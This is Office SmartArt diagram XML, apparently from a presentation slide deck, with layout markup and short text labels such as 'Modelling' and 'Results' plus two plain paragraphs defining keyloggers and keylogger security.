    <dgm:cxn modelId="{832DF6C3-3D96-4775-AAEC-6161E51EA344}" type="presOf" srcId="{E0BC6C59-02B9-411D-88F3-46E8D194D548}" destId="{2A69484E-03CF-4ADA-BF58-8B461D3B18FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{463364EA-495E-440A-A0FB-4E64014749FA}" srcId="{BCCA97D7-DCD6-402B-ABF2-F2D30DA03B34}" destId="{E0BC6C59-02B9-411D-88F3-46E8D194D548}" srcOrd="0" destOrd="0" parTransId="{D58420D4-9852-465F-BA71-AFF28C199BFA}" sibTransId="{64C3E7D0-9523-4B02-B6F1-ABD089C789A2}"/>
    <dgm:cxn modelId="{FA6E40C8-5937-42E0-8999-57C859990996}" type="presParOf" srcId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" destId="{4FF5C584-A778-4FB2-AA3A-519547D7D339}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A111A812-A1CB-46AB-997F-2A6288FEC3C7}" type="presParOf" srcId="{4FF5C584-A778-4FB2-AA3A-519547D7D339}" destId="{8D70DBDD-FBC1-4EBF-8FAE-FE26E618545D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{9B1AADCD-A731-498E-BC04-304972B5483B}" type="presParOf" srcId="{4FF5C584-A778-4FB2-AA3A-519547D7D339}" destId="{2A69484E-03CF-4ADA-BF58-8B461D3B18FE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A29380DD-A6D4-4ABC-939D-F7BC97D13813}" type="presParOf" srcId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" destId="{F63C1A9A-65D8-4999-8FAE-F4A4E1E86DC0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{87069A13-8861-4766-B455-467969F80EFC}" type="presParOf" srcId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" destId="{A37700F1-488D-4D4F-A7FD-39CC46F517A2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{064BCC17-0203-4BC3-9308-382991820670}" type="presParOf" srcId="{A37700F1-488D-4D4F-A7FD-39CC46F517A2}" destId="{D0F0E57E-4B72-43A9-B078-08F4A8993480}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{F4229C68-6866-4D06-8E30-194AC059F9EF}" type="presParOf" srcId="{A37700F1-488D-4D4F-A7FD-39CC46F517A2}" destId="{EFA91578-10C0-4AC4-BD0C-B8AFE6950A9F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{592FFB23-8BFD-405F-B5C1-68B094739699}" type="presParOf" srcId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" destId="{824E1C4F-98AE-49F8-B9F5-0472C0792A0B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{5EE9932D-5204-44C2-9CB5-9BD3706C7838}" type="presParOf" srcId="{2EB52119-4908-4173-ABEB-E6B0EFD0AEC0}" destId="{DF64735D-F589-400E-B668-03058CF1AACD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{62189695-2528-4654-B6F4-57085CA55286}" type="presParOf" srcId="{DF64735D-F589-400E-B668-03058CF1AACD}" destId="{FD4207EE-16B7-4309-A727-015EA933B6CF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{FCAFC08D-18E4-4B34-8A0F-C8B6313217D5}" type="presParOf" srcId="{DF64735D-F589-400E-B668-03058CF1AACD}" destId="{399FDF71-DBAD-4545-AF47-19429BB82785}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList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6E1972-57E3-4D71-98CA-77A080CF397A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Modelling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{720ACA9D-FBB9-4298-AC84-A87B9BC8C203}" type="parTrans" cxnId="{C1CE7642-BA23-4B42-8452-4E2668566C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFD1C286-8E2C-445F-9DE4-23ABC3BBA838}" type="sibTrans" cxnId="{C1CE7642-BA23-4B42-8452-4E2668566C43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Results</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8139130-7D5B-4406-AB3E-FEBD6B0CC1A8}" type="parTrans" cxnId="{567111FE-EDF7-4920-90FA-8ECE1E315BF6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{674D3604-0091-4635-9279-848EB5EC55DC}" type="sibTrans" cxnId="{567111FE-EDF7-4920-90FA-8ECE1E315BF6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{041127FC-E476-4385-AA34-CAB74D5FD15D}" type="pres">
      <dgm:prSet presAssocID="{CB6E1972-57E3-4D71-98CA-77A080CF397A}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{873AC139-3662-4A84-B94F-88E8EC469D07}" type="pres">
      <dgm:prSet presAssocID="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D62DEEE-1A12-454D-BAAF-4277CC7CDFEA}" type="pres">
      <dgm:prSet presAssocID="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}" presName="imgShp"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BAE0E8BA-2388-4E89-B2D8-4E1140C11899}" type="pres">
      <dgm:prSet presAssocID="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}" presName="txShp" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4C28EC0-9586-4558-BE1C-C1ABFFCAF14A}" type="pres">
      <dgm:prSet presAssocID="{BFD1C286-8E2C-445F-9DE4-23ABC3BBA838}" presName="spacing" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95522FDE-2C9F-469E-8D5F-708EB663C5BE}" type="pres">
      <dgm:prSet presAssocID="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC627C7F-3253-46E8-AF61-52D0372573AA}" type="pres">
      <dgm:prSet presAssocID="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}"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25000" b="-25000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{81AF989F-A241-4AFD-8887-9BE9CA42B35D}" type="pres">
      <dgm:prSet presAssocID="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}" presName="txShp" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custScaleX="102627" custLinFactNeighborX="897" custLinFactNeighborY="4220">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C1CE7642-BA23-4B42-8452-4E2668566C43}" srcId="{CB6E1972-57E3-4D71-98CA-77A080CF397A}" destId="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}" srcOrd="0" destOrd="0" parTransId="{720ACA9D-FBB9-4298-AC84-A87B9BC8C203}" sibTransId="{BFD1C286-8E2C-445F-9DE4-23ABC3BBA838}"/>
    <dgm:cxn modelId="{84B33E53-3707-48F1-AF13-FE16B354DDF2}" type="presOf" srcId="{CB6E1972-57E3-4D71-98CA-77A080CF397A}" destId="{041127FC-E476-4385-AA34-CAB74D5FD15D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{00EDDABD-1E01-4725-A50E-9E3E92FD42C8}" type="presOf" srcId="{0F505F7C-206E-4EF6-ABEE-A9FAB62AB60D}" destId="{BAE0E8BA-2388-4E89-B2D8-4E1140C11899}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{697BA4D0-6B11-4E7E-A1D4-1E6813A87E32}" type="presOf" srcId="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}" destId="{81AF989F-A241-4AFD-8887-9BE9CA42B35D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{567111FE-EDF7-4920-90FA-8ECE1E315BF6}" srcId="{CB6E1972-57E3-4D71-98CA-77A080CF397A}" destId="{2A4F2C32-2F42-4529-A2A4-A49BD13020BF}" srcOrd="1" destOrd="0" parTransId="{D8139130-7D5B-4406-AB3E-FEBD6B0CC1A8}" sibTransId="{674D3604-0091-4635-9279-848EB5EC55DC}"/>
    <dgm:cxn modelId="{7F556A0D-6EBC-4B7C-8DBC-BC1AF1CA48C8}" type="presParOf" srcId="{041127FC-E476-4385-AA34-CAB74D5FD15D}" destId="{873AC139-3662-4A84-B94F-88E8EC469D07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{64539939-D21A-44F8-B86A-5738245FB56B}" type="presParOf" srcId="{873AC139-3662-4A84-B94F-88E8EC469D07}" destId="{6D62DEEE-1A12-454D-BAAF-4277CC7CDFEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{EF59F3E0-7F71-425D-B578-6356AB76E957}" type="presParOf" srcId="{873AC139-3662-4A84-B94F-88E8EC469D07}" destId="{BAE0E8BA-2388-4E89-B2D8-4E1140C11899}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{94C3B179-08EC-43EA-81C1-AFC84ABB3CEF}" type="presParOf" srcId="{041127FC-E476-4385-AA34-CAB74D5FD15D}" destId="{D4C28EC0-9586-4558-BE1C-C1ABFFCAF14A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{6797B17F-1F55-41E4-AFF2-E83DCBD3E152}" type="presParOf" srcId="{041127FC-E476-4385-AA34-CAB74D5FD15D}" destId="{95522FDE-2C9F-469E-8D5F-708EB663C5BE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{10DC039A-6C7C-4E40-A060-1BAB4AED3DD7}" type="presParOf" srcId="{95522FDE-2C9F-469E-8D5F-708EB663C5BE}" destId="{FC627C7F-3253-46E8-AF61-52D0372573AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{0AA705AC-09D2-43CA-878D-DA54439D716E}" type="presParOf" srcId="{95522FDE-2C9F-469E-8D5F-708EB663C5BE}" destId="{81AF989F-A241-4AFD-8887-9BE9CA42B35D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>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C16E87-2F44-4C9F-A4F4-7CC727180135}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d2" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2058BFE7-92E9-44E2-BD66-96860586D0B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>A keylogger, short for keystroke logger, is a type of surveillance technology used to monitor and record each keystroke typed on a computer keyboard. Keyloggers can be either software-based or hardware-based and are often used for a variety of purposes, both legitimate and malicious.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFC54103-5BF1-4B4B-8A8D-081282447872}" type="parTrans" cxnId="{3E55A7C4-D28A-4D5F-8A36-5C5C462AD83D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6F15063-BAAE-44B0-B9D9-3C9233AB20D4}" type="sibTrans" cxnId="{3E55A7C4-D28A-4D5F-8A36-5C5C462AD83D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD829D3B-880B-41D9-9C49-91F59CD454DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Keylogger security refers to the practices and measures taken to protect against the malicious use of keyloggers. Keyloggers can pose significant security risks, as they capture keystrokes and can steal sensitive information such as passwords, credit card numbers, and personal messages. Therefore, implementing keylogger security involves various strategies to detect, prevent, and mitigate the impact of keyloggers.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5240FEAC-592C-4281-9122-6FA1F100F00E}" type="parTrans" cxnId="{8E49392B-B1ED-4FDC-B956-BA994AA04C2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C843F40-A176-4A18-984F-5A4D21925AD9}" type="sibTrans" cxnId="{8E49392B-B1ED-4FDC-B956-BA994AA04C2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF3DB4A0-B569-41E7-AB26-C02FCF54C5CA}" type="pres">
      <dgm:prSet presAssocID="{C8C16E87-2F44-4C9F-A4F4-7CC727180135}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E0CAE6C1-8CA3-40A4-8876-ED85376EBEBF}" type="pres">
      <dgm:prSet presAssocID="{2058BFE7-92E9-44E2-BD66-96860586D0B7}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborY="23593">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2DC00957-7F91-4C26-9934-3BB1365E82BF}" type="pres">
      <dgm:prSet presAssocID="{C6F15063-BAAE-44B0-B9D9-3C9233AB20D4}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{617564C6-F43D-4241-8926-AE2FA0BBD53A}" type="pres">
      <dgm:prSet presAssocID="{BD829D3B-880B-41D9-9C49-91F59CD454DE}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8E49392B-B1ED-4FDC-B956-BA994AA04C2A}" srcId="{C8C16E87-2F44-4C9F-A4F4-7CC727180135}" destId="{BD829D3B-880B-41D9-9C49-91F59CD454DE}" srcOrd="1" destOrd="0" parTransId="{5240FEAC-592C-4281-9122-6FA1F100F00E}" sibTransId="{8C843F40-A176-4A18-984F-5A4D21925AD9}"/>
    <dgm:cxn modelId="{D024CF98-9F6A-4665-A0E8-A0FA004B482C}" type="presOf" srcId="{BD829D3B-880B-41D9-9C49-91F59CD454DE}" destId="{617564C6-F43D-4241-8926-AE2FA0BBD53A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3E55A7C4-D28A-4D5F-8A36-5C5C462AD83D}" srcId="{C8C16E87-2F44-4C9F-A4F4-7CC727180135}" destId="{2058BFE7-92E9-44E2-BD66-96860586D0B7}" srcOrd="0" destOrd="0" parTransId="{BFC54103-5BF1-4B4B-8A8D-081282447872}" sibTransId="{C6F15063-BAAE-44B0-B9D9-3C9233AB20D4}"/>
    <dgm:cxn modelId="{504233D5-CAE2-4C0C-862B-DFC56E8A6E3D}" type="presOf" srcId="{C8C16E87-2F44-4C9F-A4F4-7CC727180135}" destId="{CF3DB4A0-B569-41E7-AB26-C02FCF54C5CA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{92C9CBFF-670D-4A02-83C7-B5B872491FE0}" type="presOf" srcId="{2058BFE7-92E9-44E2-BD66-96860586D0B7}" destId="{E0CAE6C1-8CA3-40A4-8876-ED85376EBEBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{22ED35CD-95D3-4A22-A867-C2D45A56EBDD}" type="presParOf" srcId="{CF3DB4A0-B569-41E7-AB26-C02FCF54C5CA}" destId="{E0CAE6C1-8CA3-40A4-8876-ED85376EBEBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0BA7BE78-89F2-435E-A8C0-3C072A72903F}" type="presParOf" srcId="{CF3DB4A0-B569-41E7-AB26-C02FCF54C5CA}" destId="{2DC00957-7F91-4C26-9934-3BB1365E82BF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA71FF61-3BBF-404F-B9CB-41128F7B9D1F}" type="presParOf" srcId="{CF3DB4A0-B569-41E7-AB26-C02FCF54C5CA}" destId="{617564C6-F43D-4241-8926-AE2FA0BBD53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A24424-6EDA-45D8-A72C-D3790026D988}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout" loCatId="picture" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F942AD7B-7D80-49D1-B0DC-920D09D883BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CCC8D4B-2AC7-4312-95DD-3C9968C15F23}" type="parTrans" cxnId="{9778CBDC-9D4F-4E0C-98DC-AA68F3DCECEF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7DA6B36-E80E-4410-A7F3-245431950B45}" type="sibTrans" cxnId="{9778CBDC-9D4F-4E0C-98DC-AA68F3DCECE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42000" r="-42000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}">
      <dgm:prSet phldrT="[Text]" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{525D8727-AC1E-430F-8D1F-E7B6DA3039B8}" type="parTrans" cxnId="{3E98A140-D6C2-4532-B168-04D83FAA411B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE686D3B-8B07-4DBB-910F-D3CA940E6BFA}" type="sibTrans" cxnId="{3E98A140-D6C2-4532-B168-04D83FAA411B}">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1000" r="-41000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}">
      <dgm:prSet phldrT="[Text]" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3AA87C0-E78D-40D1-8A0A-AA76AEC23C0C}" type="parTrans" cxnId="{98DE9FE8-7961-46F9-B36F-9772284C995E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F5392A3-0EF3-41E2-98B2-7FF24E053E9D}" type="sibTrans" cxnId="{98DE9FE8-7961-46F9-B36F-9772284C995E}">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50000" r="-50000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{940E49CC-9458-4157-9F13-575EB291A1AF}">
      <dgm:prSet phldrT="[Text]" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC6BDCF8-DEFE-4159-883A-A1FC6C2FB6DB}" type="parTrans" cxnId="{C10A4CA3-E986-46C3-8E89-09D3524E4E93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05657FBD-32E2-4D52-AC48-F5CD8A57A04F}" type="sibTrans" cxnId="{C10A4CA3-E986-46C3-8E89-09D3524E4E93}">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8000" r="-18000"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4443CE90-89FC-4554-A3A3-0EC516799B92}" type="pres">
      <dgm:prSet presAssocID="{89A24424-6EDA-45D8-A72C-D3790026D988}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" type="pres">
      <dgm:prSet presAssocID="{89A24424-6EDA-45D8-A72C-D3790026D988}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{853E4F57-E0CC-4514-8F94-EB25922F53ED}" type="pres">
      <dgm:prSet presAssocID="{E7DA6B36-E80E-4410-A7F3-245431950B45}" presName="picture_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DF800C4-E24C-4DD9-B8A4-DF333F840A4C}" type="pres">
      <dgm:prSet presAssocID="{E7DA6B36-E80E-4410-A7F3-245431950B45}" presName="pictureRepeatNode" presStyleLbl="alignImgPlace1" presStyleIdx="0" presStyleCnt="4" custAng="1084831"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F67353A2-478A-41D6-ADDA-0C1C9A45F685}" type="pres">
      <dgm:prSet presAssocID="{F942AD7B-7D80-49D1-B0DC-920D09D883BC}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34E8A4A9-0CE0-4D8C-B17A-0DBE2D154F96}" type="pres">
      <dgm:prSet presAssocID="{EE686D3B-8B07-4DBB-910F-D3CA940E6BFA}" presName="picture_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37B0FEB4-FCDD-4EEA-85F3-4B3EE2BFA535}" type="pres">
      <dgm:prSet presAssocID="{EE686D3B-8B07-4DBB-910F-D3CA940E6BFA}" presName="pictureRepeatNode" presStyleLbl="alignImgPlace1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{661A007B-7493-43FD-B057-EBE1D7360BA6}" type="pres">
      <dgm:prSet presAssocID="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}" presName="line_2" presStyleLbl="parChTrans1D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14ED2BAA-3935-4ACC-8970-0BD2110640EE}" type="pres">
      <dgm:prSet presAssocID="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}" presName="textparent_2" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
